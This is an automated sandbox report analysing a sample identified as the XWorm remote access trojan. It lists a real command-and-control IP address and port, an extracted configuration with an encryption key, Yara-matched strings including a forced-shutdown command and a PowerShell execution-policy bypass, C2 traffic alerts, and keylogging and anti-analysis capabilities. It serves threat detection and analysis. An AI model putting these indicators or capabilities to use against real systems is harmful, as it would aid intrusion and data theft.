Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe

Overview

General Information

Sample name:17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe
Analysis ID:1586002
MD5:5ab0db61a062d4ac36716b51c5ddac3a
SHA1:ad625cd275fafd23bbfbcf81a187031724bdef02
SHA256:929781941202c78878fbbf8e872f8559cdbd074c4e37f9dfcc8164422fbf9ddc
Tags:base64-decodedexeuser-abuse_ch
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Found potential dummy code loops (likely to delay analysis)
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["87.120.116.179"], "Port": 1300, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeJoeSecurity_XWormYara detected XWormJoe Security
    17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exerat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
    • 0x6417:$str01: $VB$Local_Port
    • 0x6408:$str02: $VB$Local_Host
    • 0x670c:$str03: get_Jpeg
    • 0x60c7:$str04: get_ServicePack
    • 0x714e:$str05: Select * from AntivirusProduct
    • 0x734c:$str06: PCRestart
    • 0x7360:$str07: shutdown.exe /f /r /t 0
    • 0x7412:$str08: StopReport
    • 0x73e8:$str09: StopDDos
    • 0x74ea:$str10: sendPlugin
    • 0x7696:$str12: -ExecutionPolicy Bypass -File "
    • 0x77bf:$str13: Content-length: 5235
    17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x7a2c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x7ac9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x7bde:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x76da:$cnc4: POST / HTTP/1.1

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000000.1323714120.00000000003D2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000000.00000000.1323714120.00000000003D2000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x782c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x78c9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x79de:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x74da:$cnc4: POST / HTTP/1.1
      00000000.00000002.3782866147.00000000026A1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        Process Memory Space: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe PID: 7776JoeSecurity_XWormYara detected XWormJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.0.17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe.3d0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
            0.0.17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe.3d0000.0.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
            • 0x6417:$str01: $VB$Local_Port
            • 0x6408:$str02: $VB$Local_Host
            • 0x670c:$str03: get_Jpeg
            • 0x60c7:$str04: get_ServicePack
            • 0x714e:$str05: Select * from AntivirusProduct
            • 0x734c:$str06: PCRestart
            • 0x7360:$str07: shutdown.exe /f /r /t 0
            • 0x7412:$str08: StopReport
            • 0x73e8:$str09: StopDDos
            • 0x74ea:$str10: sendPlugin
            • 0x7696:$str12: -ExecutionPolicy Bypass -File "
            • 0x77bf:$str13: Content-length: 5235
            0.0.17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe.3d0000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x7a2c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x7ac9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x7bde:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x76da:$cnc4: POST / HTTP/1.1

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-08T16:01:13.077801+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:01:16.242604+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:01:24.618805+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:01:36.166777+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:01:46.243779+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:01:47.713242+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:01:59.244040+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:02:09.782194+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:02:10.353231+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:02:13.370500+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:02:15.489399+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:02:16.258225+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:02:17.034068+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:02:28.556337+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:02:34.587963+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:02:36.254498+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:02:42.464649+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:02:44.860550+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:02:44.908106+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:02:44.955792+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:02:45.050926+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:02:45.375712+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:02:46.232947+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:02:54.884571+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:03:03.197868+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:03:03.293292+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:03:13.388453+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:03:15.841576+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:03:16.234270+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:03:18.732296+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:03:30.215641+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:03:31.244627+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:03:31.333076+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:03:42.863753+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:03:43.908475+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:03:46.241774+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:03:51.681589+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:03:51.770206+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:04:02.015912+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:04:02.119378+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:04:12.201753+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:04:16.264450+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:04:16.870901+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:04:17.371295+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:04:18.689405+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:04:22.603185+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:04:22.707431+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:04:22.812462+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:04:22.914038+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:04:25.762894+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:04:37.416768+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:04:38.583436+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:04:40.068279+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:04:46.615189+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:04:48.636507+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:04:48.735921+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:04:50.307584+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:04:53.838493+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:04:53.935124+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:04:54.104400+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:04:54.295618+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:05:00.072731+010028528701Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-08T16:01:13.127851+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:01:24.620770+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:01:36.170007+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:01:47.714831+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:01:59.246666+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:02:09.784371+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:02:10.362630+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:02:13.374062+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:02:15.497763+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:02:17.035854+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:02:28.557879+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:02:34.590606+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:02:36.258427+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:02:42.466617+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:02:44.862387+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:02:44.909886+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:02:44.957595+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:02:45.052851+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:02:45.382678+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:02:54.888266+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:03:03.199865+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:03:03.295087+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:03:13.395074+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:03:15.845023+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:03:18.750360+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:03:30.297465+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:03:31.246525+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:03:31.334683+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:03:31.441862+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:03:31.446747+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:03:42.865670+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:03:43.910630+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:03:51.683612+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:03:51.771932+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:04:02.018831+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:04:02.121338+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:04:12.204105+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:04:16.881663+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:04:17.389756+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:04:18.696855+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:04:22.613852+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:04:22.718825+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:04:22.820238+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:04:22.921977+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:04:25.764835+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:04:37.430720+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:04:38.585572+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:04:40.070225+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:04:48.639685+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:04:48.744672+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:04:50.309402+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:04:53.841621+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:04:53.941337+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:04:54.010342+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:04:54.106204+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:04:54.201684+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:04:54.207001+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:04:54.299413+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            2025-01-08T16:05:00.073653+010028529231Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-08T16:01:16.242604+010028528741Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:01:46.243779+010028528741Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:02:16.258225+010028528741Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:02:46.232947+010028528741Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:03:16.234270+010028528741Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:03:46.241774+010028528741Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:04:16.264450+010028528741Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            2025-01-08T16:04:46.615189+010028528741Malware Command and Control Activity Detected87.120.116.1791300192.168.2.949757TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-08T16:02:44.616880+010028531931Malware Command and Control Activity Detected192.168.2.94975787.120.116.1791300TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeAvira: detected
            Found malware configuration
            Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeMalware Configuration Extractor: Xworm {"C2 url": ["87.120.116.179"], "Port": 1300, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
            Multi AV Scanner detection for submitted file
            Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeReversingLabs: Detection: 84%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeJoe Sandbox ML: detected
            Sample uses string decryption to hide its real strings
            Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeString decryptor: 87.120.116.179
            Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeString decryptor: 1300
            Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeString decryptor: <123456789>
            Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeString decryptor: <Xwormmm>
            Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeString decryptor: 08-01-25
            Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeString decryptor: USB.exe
            Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.9:49757 -> 87.120.116.179:1300
            Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 87.120.116.179:1300 -> 192.168.2.9:49757
            Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.9:49757 -> 87.120.116.179:1300
            Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 87.120.116.179:1300 -> 192.168.2.9:49757
            Source: Network trafficSuricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.9:49757 -> 87.120.116.179:1300
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: 87.120.116.179
            Source: global trafficTCP traffic: 192.168.2.9:49757 -> 87.120.116.179:1300
            Source: global trafficTCP traffic: 192.168.2.9:54647 -> 1.1.1.1:53
            Source: Joe Sandbox ViewIP Address: 87.120.116.179 87.120.116.179
            Source: Joe Sandbox ViewASN Name: UNACS-AS-BG8000BurgasBG UNACS-AS-BG8000BurgasBG
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.116.179
            Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, 00000000.00000002.3782866147.00000000026A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Contains functionality to log keystrokes (.Net Source)
            Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, XLogger.cs.Net Code: KeyboardLayout

